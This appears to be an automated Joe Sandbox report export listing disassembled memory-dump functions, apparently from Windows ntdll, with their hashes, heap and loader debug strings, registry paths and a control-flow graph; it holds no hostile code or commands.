                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 7e148e907081296fdf1f20f1bb9e98a4d04e4381a8c9354387d7ca7b702aefe0
                                                  • Instruction ID: ecad89796e639348efc496d93f55834195e1a754f47d00b1fb6fe10d0ecc4517
                                                  • Opcode Fuzzy Hash: 7e148e907081296fdf1f20f1bb9e98a4d04e4381a8c9354387d7ca7b702aefe0
                                                  • Instruction Fuzzy Hash: AA90027174550413D21171988504B07000A47D0241F95C413A542462CD96568A56A121

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 553 36df94e0-36df9529 554 36df952b-36df9530 553->554 555 36df9578-36df9587 553->555 557 36df9534-36df953a 554->557 556 36df9589-36df958e 555->556 555->557 558 36df9d13-36df9d27 call 36d94c30 556->558 559 36df9695-36df96bd call 36d99020 557->559 560 36df9540-36df9564 call 36d99020 557->560 567 36df96bf-36df96da call 36df9d2a 559->567 568 36df96dc-36df9712 559->568 569 36df9566-36df9573 call 36e1972b 560->569 570 36df9593-36df9634 GetPEB call 36dfdc65 560->570 574 36df9714-36df9716 567->574 568->574 579 36df967d-36df9690 RtlDebugPrintTimes 569->579 580 36df9636-36df9644 570->580 581 36df9652-36df9667 570->581 574->558 578 36df971c-36df9731 RtlDebugPrintTimes 574->578 578->558 587 36df9737-36df973e 578->587 579->558 580->581 582 36df9646-36df964b 580->582 581->579 583 36df9669-36df966e 581->583 582->581 585 36df9673-36df9676 583->585 586 36df9670 583->586 585->579 586->585 587->558 589 36df9744-36df975f 587->589 590 36df9763-36df9774 call 36dfa808 589->590 593 36df977a-36df977c 590->593 594 36df9d11 590->594 593->558 595 36df9782-36df9789 593->595 594->558 596 36df978f-36df9794 595->596 597 36df98fc-36df9902 595->597 598 36df97bc 596->598 599 36df9796-36df979c 596->599 600 36df9a9c-36df9aa2 597->600 601 36df9908-36df9937 call 36d99020 597->601 603 36df97c0-36df9811 call 36d99020 RtlDebugPrintTimes 598->603 599->598 602 36df979e-36df97b2 599->602 605 36df9af4-36df9af9 600->605 606 36df9aa4-36df9aad 600->606 619 36df9939-36df9944 601->619 620 36df9970-36df9985 601->620 609 36df97b8-36df97ba 602->609 610 36df97b4-36df97b6 602->610 603->558 647 36df9817-36df981b 603->647 607 36df9aff-36df9b07 605->607 608 36df9ba8-36df9bb1 605->608 606->590 613 36df9ab3-36df9aef call 36d99020 606->613 615 36df9b09-36df9b0d 607->615 616 36df9b13-36df9b3d call 36df8513 607->616 608->590 618 36df9bb7-36df9bba 608->618 609->603 610->603 632 36df9ce9 613->632 615->608 615->616 644 36df9d08-36df9d0c 616->644 645 36df9b43-36df9b9e call 36d99020 RtlDebugPrintTimes 616->645 621 36df9c7d-36df9cb4 call 36d99020 618->621 622 36df9bc0-36df9c0a 618->622 623 36df994f-36df996e 619->623 624 36df9946-36df994d 619->624 626 36df9987-36df9989 620->626 627 36df9991-36df9998 620->627 655 36df9cbb-36df9cc2 621->655 656 36df9cb6 621->656 629 36df9c0c 622->629 630 36df9c11-36df9c1e 622->630 631 36df99d9-36df99f6 RtlDebugPrintTimes 623->631 624->623 633 36df998f 626->633 634 36df998b-36df998d 626->634 635 36df99bd-36df99bf 627->635 629->630 641 36df9c2a-36df9c2d 630->641 642 36df9c20-36df9c23 630->642 631->558 659 36df99fc-36df9a1f call 36d99020 631->659 643 36df9ced 632->643 633->627 634->627 639 36df999a-36df99a4 635->639 640 36df99c1-36df99d7 635->640 652 36df99ad 639->652 653 36df99a6 639->653 640->631 650 36df9c2f-36df9c32 641->650 651 36df9c39-36df9c7b 641->651 642->641 649 36df9cf1-36df9d06 RtlDebugPrintTimes 643->649 644->590 645->558 686 36df9ba4 645->686 657 36df981d-36df9825 647->657 658 36df986b-36df9880 647->658 649->558 649->644 650->651 651->649 663 36df99af-36df99b1 652->663 653->640 661 36df99a8-36df99ab 653->661 664 36df9ccd 655->664 665 36df9cc4-36df9ccb 655->665 656->655 666 36df9827-36df9850 call 36df8513 657->666 667 36df9852-36df9869 657->667 660 36df9886-36df9894 658->660 683 36df9a3d-36df9a58 659->683 684 36df9a21-36df9a3b 659->684 670 36df9898-36df98ef call 36d99020 RtlDebugPrintTimes 660->670 661->663 672 36df99bb 663->672 673 36df99b3-36df99b5 663->673 674 36df9cd1-36df9cd7 664->674 665->674 666->670 667->660 670->558 689 36df98f5-36df98f7 670->689 672->635 673->672 679 36df99b7-36df99b9 673->679 680 36df9cde-36df9ce4 674->680 681 36df9cd9-36df9cdc 674->681 679->635 680->643 682 36df9ce6 680->682 681->632 682->632 687 36df9a5d-36df9a8b RtlDebugPrintTimes 683->687 684->687 686->608 687->558 691 36df9a91-36df9a97 687->691 689->644 691->618
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $ $0
                                                  • API String ID: 3446177414-3352262554
                                                  • Opcode ID: 6b50d9a61c30c5d7bb4cf16196ccd75913ed126b2b7c87e60e44723ae2e920de
                                                  • Instruction ID: 3d68648b6187e90e4617fae9607241a421edbd5a54c081dbf7d8e29714648ede
                                                  • Opcode Fuzzy Hash: 6b50d9a61c30c5d7bb4cf16196ccd75913ed126b2b7c87e60e44723ae2e920de
                                                  • Instruction Fuzzy Hash: E13235B1A183818FE310CF69C880B5BBBE5BF88344F15492EF59A8B350D776D949CB52

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                  • API String ID: 3446177414-1700792311
                                                  • Opcode ID: 9f184e7b9f826e91f648a6b4341e50ce7c76c5b93d1802d6aaab2d26958699f1
                                                  • Instruction ID: eb1817aef793023c6bd9474fe555463318ab24ff2bc5e9abf7865ce54e756b00
                                                  • Opcode Fuzzy Hash: 9f184e7b9f826e91f648a6b4341e50ce7c76c5b93d1802d6aaab2d26958699f1
                                                  • Instruction Fuzzy Hash: 52D14579910680EFDB12DFB6C840AADBBF2FF19309F448049E444AB651CB34D98ACF65
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                  • API String ID: 3446177414-1745908468
                                                  • Opcode ID: 778d01c5b67104364772d99d2205849f42a2423cc52d47114c88fbad2bff3c02
                                                  • Instruction ID: f0bd6f0ee50cd04f7f8fe09effe04abfa5bb245ce3d47a1329c54993284c4992
                                                  • Opcode Fuzzy Hash: 778d01c5b67104364772d99d2205849f42a2423cc52d47114c88fbad2bff3c02
                                                  • Instruction Fuzzy Hash: 0F912276920740EFDB02CFBAC840A9DBBF2FF19714F568059E444AF6A1CB369845CB61
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                  • API String ID: 0-3591852110
                                                  • Opcode ID: d30a97d38b7e579687bdfce599dfd35417f2377c8eb40dfd5edbc726cb12caa9
                                                  • Instruction ID: 30f2c9ef4b08f09e575d407cdeaedbec6d48f1bc9504fc7aafca8e2538c698e0
                                                  • Opcode Fuzzy Hash: d30a97d38b7e579687bdfce599dfd35417f2377c8eb40dfd5edbc726cb12caa9
                                                  • Instruction Fuzzy Hash: 6912BE78A00741EFE7168FA6C440BA6BBF5FF09318F548459E4858F691DB34E889CFA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                  • API String ID: 0-3532704233
                                                  • Opcode ID: 76df26a67148a4f2503989d9541a9a770d22014d63023353d9079e4c1cd715cd
                                                  • Instruction ID: 22f216fed25ee81f749fb7e91f8d27eb2df0d61b11253dcf7132ced5e1daa051
                                                  • Opcode Fuzzy Hash: 76df26a67148a4f2503989d9541a9a770d22014d63023353d9079e4c1cd715cd
                                                  • Instruction Fuzzy Hash: E8B1A0769183559FD712DF24C840A5FB7E8AF88758F42492EF888D7244DB70DD48CBA2
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 3446177414-3570731704
                                                  • Opcode ID: 3299569b2b81dc2ace57465057dcd3c26d396e4215bae9e3486c4164c0804ad0
                                                  • Instruction ID: c39602bbe9d4dba9a4b62395b6240ad7178be7da38f88851b6d0a7877c1b9dde
                                                  • Opcode Fuzzy Hash: 3299569b2b81dc2ace57465057dcd3c26d396e4215bae9e3486c4164c0804ad0
                                                  • Instruction Fuzzy Hash: FC925775E11328CFEB20CF2ACC40B99BBB5AF45348F5181EAD989A7250DB309E85CF51
                                                  APIs
                                                  • RtlDebugPrintTimes.NTDLL ref: 36D7D959
                                                    • Part of subcall function 36D54859: RtlDebugPrintTimes.NTDLL ref: 36D548F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-1975516107
                                                  • Opcode ID: f1acb97a1adb99957046a1e8bf7945dda3b020a51af8e1574ce33f9dc3c77887
                                                  • Instruction ID: d365f9d5b22275146824bdb50a6e48ee353bba28bb624f9c96eded083172c969
                                                  • Opcode Fuzzy Hash: f1acb97a1adb99957046a1e8bf7945dda3b020a51af8e1574ce33f9dc3c77887
                                                  • Instruction Fuzzy Hash: A751FEB5E04345DFEB05CFA5C88478EBBB2BF48308F644059C511BB289CB74A84ACF92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                  • API String ID: 0-3063724069
                                                  • Opcode ID: 892b8c87e2aee6db2c31d901f251c3d056733b54389ccd96ccc8cf1025460705
                                                  • Instruction ID: 6e1a1a51a48fab261c4d4f209a193705a9373dd4bdd49e2f4d512a21d1f979be
                                                  • Opcode Fuzzy Hash: 892b8c87e2aee6db2c31d901f251c3d056733b54389ccd96ccc8cf1025460705
                                                  • Instruction Fuzzy Hash: F3D1C2B2806351AFE721CB518840BAFB7E8AF84754F41092EF9C5AB250D774C948CBE3
                                                  Strings
                                                  • @, xrefs: 36D4D313
                                                  • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 36D4D262
                                                  • Control Panel\Desktop\LanguageConfiguration, xrefs: 36D4D196
                                                  • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 36D4D146
                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 36D4D2C3
                                                  • @, xrefs: 36D4D0FD
                                                  • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 36D4D0CF
                                                  • @, xrefs: 36D4D2AF
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                  • API String ID: 0-1356375266
                                                  • Opcode ID: b02c22bd155af519eec9e81c8be9c49968de42fbf8dc236ae633fd8ea26610a6
                                                  • Instruction ID: 2f504f13be86f772189380ab97a21c77cf16cd6bf8bb8097a912432c86c2838c
                                                  • Opcode Fuzzy Hash: b02c22bd155af519eec9e81c8be9c49968de42fbf8dc236ae633fd8ea26610a6
                                                  • Instruction Fuzzy Hash: 1EA17E719083459FE322DF21C880B9BB7E8BB84759F51492EF98896244DB74D908CFA3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-523794902
                                                  • Opcode ID: ae82a968b3ff635deaba54b118ff5463c39df1c48729f10f5e1220ac02f6fcc4
                                                  • Instruction ID: 5b1edf88453210d7c07dc6ee254f2bd94e12472dd0a04155dec00352d584455a
                                                  • Opcode Fuzzy Hash: ae82a968b3ff635deaba54b118ff5463c39df1c48729f10f5e1220ac02f6fcc4
                                                  • Instruction Fuzzy Hash: BC42CC75A083819FE312DF29C884A2ABBE5FF88348F54496DE485CB261DF34DD45CB62
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                  • API String ID: 0-122214566
                                                  • Opcode ID: fddb577091bafb7edeacce888d2c672bf963b4b7f1ed6811ee1be2df18300998
                                                  • Instruction ID: ea042178f9ff56a33ae560652e4bb860eb714e470ff111dfd5c712ba3b97d5c9
                                                  • Opcode Fuzzy Hash: fddb577091bafb7edeacce888d2c672bf963b4b7f1ed6811ee1be2df18300998
                                                  • Instruction Fuzzy Hash: 58C11771E00315ABEB248F67CC90BBEB7B5AF4930CF944069E846EB290DB74C955C7A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-4253913091
                                                  • Opcode ID: 9f71cf1dbb95aa0528a2a7f154b6226fcc60bf06c353361ae839a3f446c615c4
                                                  • Instruction ID: 74c37dc644570283371ccb7077d96a06faf612faee9ad902cc0e3ca62df5642b
                                                  • Opcode Fuzzy Hash: 9f71cf1dbb95aa0528a2a7f154b6226fcc60bf06c353361ae839a3f446c615c4
                                                  • Instruction Fuzzy Hash: 33F1EC74A00605DFEB15CF6AD980F6AB7B6FF44348F6481A9E4469B384DB30E981CF91
                                                  Strings
                                                  • RTL: Re-Waiting, xrefs: 36DC031E
                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 36DC02E7
                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 36DC02BD
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                  • API String ID: 0-2474120054
                                                  • Opcode ID: c8a5ba973d1294fa61227ec02e0110a8fa29b648a238ba9e660b15c30a0684fe
                                                  • Instruction ID: 945c216e0d22a5291edea487000dadaa93fdfc6abede84cbc0b016d9756abc38
                                                  • Opcode Fuzzy Hash: c8a5ba973d1294fa61227ec02e0110a8fa29b648a238ba9e660b15c30a0684fe
                                                  • Instruction Fuzzy Hash: 67E19D74A087419FE721CF29D880B1AB7E0BF84358F200A5DE5A58B2E1DB75D945CB93
                                                  Strings
                                                  • Kernel-MUI-Language-Disallowed, xrefs: 36D75352
                                                  • WindowsExcludedProcs, xrefs: 36D7522A
                                                  • Kernel-MUI-Language-SKU, xrefs: 36D7542B
                                                  • Kernel-MUI-Language-Allowed, xrefs: 36D7527B
                                                  • Kernel-MUI-Number-Allowed, xrefs: 36D75247
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                  • API String ID: 0-258546922
                                                  • Opcode ID: 4179aba914b2ab6a6c373e303492c7c462189f185bac0818da69de094ca37739
                                                  • Instruction ID: 1e2152da1a3e6401e1dee542bd49d4bd174e5efbd64b8ac1b55b2b27771c6da6
                                                  • Opcode Fuzzy Hash: 4179aba914b2ab6a6c373e303492c7c462189f185bac0818da69de094ca37739
                                                  • Instruction Fuzzy Hash: F2F13BB6D10229EFDB01CFA5C980ADEBBF9FF48654F51416AE501E7210DB749E01CBA2
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 3f262142d94e00b7dd0e1a1e4e33883ac2085bbf9402c0ab2c22a49f62de04de
                                                  • Instruction ID: 872b3bdd0ddefdced099c055ac3f2b2dc5ba0bc1c4ea30dedee552723aabc495
                                                  • Opcode Fuzzy Hash: 3f262142d94e00b7dd0e1a1e4e33883ac2085bbf9402c0ab2c22a49f62de04de
                                                  • Instruction Fuzzy Hash: 73F12973E006118FDB08DF69C99067EBBF7EF88208B19416DD456EB380E674E945CB90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                  • API String ID: 0-3061284088
                                                  • Opcode ID: c5eacdd5227dfbca6816bb8bd5880d50cd8e9b6432d1ce403eff341472fbcc9b
                                                  • Instruction ID: 42f8514a01dd7a483aa129359c4513a173d667ad70f558c291b64a7b9709c0ba
                                                  • Opcode Fuzzy Hash: c5eacdd5227dfbca6816bb8bd5880d50cd8e9b6432d1ce403eff341472fbcc9b
                                                  • Instruction Fuzzy Hash: D0014C36419390FEE226A375D80DF527BF4DB53774F244049F00047990CE69DC8AC575
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                  • API String ID: 0-3178619729
                                                  • Opcode ID: c15ac5ba30e42de57da998b8134cc520e8c9e6eed7c7a8fc3fadb5968c225941
                                                  • Instruction ID: 0a1a59facc7aa21e71921911c206219a2197127926af3617022d21fb9fda08e4
                                                  • Opcode Fuzzy Hash: c15ac5ba30e42de57da998b8134cc520e8c9e6eed7c7a8fc3fadb5968c225941
                                                  • Instruction Fuzzy Hash: 73139F74E00359CFEB15CF6AC8947A9BBF1BF48308F948199D895AB381D734A945CFA0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
